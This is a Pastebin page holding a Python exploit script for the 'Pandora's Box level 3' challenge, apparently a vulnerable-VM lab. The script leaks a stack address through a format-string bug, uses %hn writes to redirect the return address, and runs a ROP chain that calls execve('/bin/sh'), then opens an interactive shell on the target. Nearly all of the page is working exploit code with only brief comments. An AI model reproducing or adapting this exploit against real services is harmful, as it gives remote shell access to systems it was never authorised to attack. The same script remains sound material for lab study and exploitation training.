Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # A slightly different approach than used here http://jellevergeer.com/pandoras-box-level-3/
- #
- # This approach is different and avoids dealing the stack cookies
- # Enjoy
- import struct
- import socket
- import telnetlib
- REMOTE = '192.168.56.101'
- # REMOTE = '127.0.0.1'
- PORT = 44101
- mysocket = socket.socket()
- mysocket.connect((REMOTE, PORT))
- # Obtain a leaked stack address
- mysocket.send('9999%08x' + '\n')
- # Ensure all response data is returned
- while True:
- data = mysocket.recv(1024)
- addr_loc = data.find('9999')
- if addr_loc is not -1:
- break
- addr = data[addr_loc+4:addr_loc+12]
- print "leaked stack address is " + addr
- # Calculate offsets for the return address of the function "start_game"
- start_game_addr = int(addr, 16) - 48
- print "start_game address is " + hex(start_game_addr)
- # Calculate offset for the future "/bin/sh" string sent next
- bin_sh_addr = int(addr, 16) + 278
- print "bin_sh address is " + hex(bin_sh_addr)
- sploit = '9999'
- sploit += struct.pack('<L', start_game_addr) # Offsets for 0x080485af (start_game)
- # sploit += struct.pack('<L', 0xCCCCCCCC) # Debug values
- sploit += struct.pack('<L', start_game_addr + 2) # Offsets for 0x080485af (start_game+2)
- # sploit += struct.pack('<L', 0xDDDDDDDD) # Debug values
- # Change return address from start_game to ROP bootstrap
- sploit += '%33521x%11$hn' # 0x080a8308 - add esp,0x10c; ret
- sploit += '%34050x%12$hn' # 0x080a8308 - add esp,0x10c; ret
- sploit += '\x41' * 0xba # Padding because above we moved 0x10c 'up' the stack
- # Zero eax
- sploit += struct.pack('<L', 0x0809807f) # xor eax,eax; ret
- # Zero ecx + set ebx with addr of '/bin/sh'
- sploit += struct.pack('<L', 0x080540cd) # pop ecx; pop ebx; ret
- sploit += '\x00' * 4 + struct.pack('<L', bin_sh_addr) # Address of /bin/sh
- # Zero edx
- sploit += struct.pack('<L', 0x080540a6) # pop edx; ret
- sploit += '\x00' * 4 # set edx to 0
- # Set eax to 11 (syscall for execve)
- # sploit += struct.pack('<L', 0xEEEEEEEE) # Debug value
- sploit += struct.pack('<L', 0x0806ad3e) * 5 # inc eax; inc eax; ret
- sploit += struct.pack('<L', 0x0806ad3f) # inc eax; ret
- sploit += struct.pack('<L', 0x08054820) # int 0x80; ret
- # And finally the '/bin/sh' string
- sploit += '////////////////bin/sh\x00' # Padding then null terminated '/bin/sh'
- # Bombs away
- mysocket.send(sploit)
- # Drop into a interactive shell
- tn = telnetlib.Telnet()
- tn.sock = mysocket
- tn.interact()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement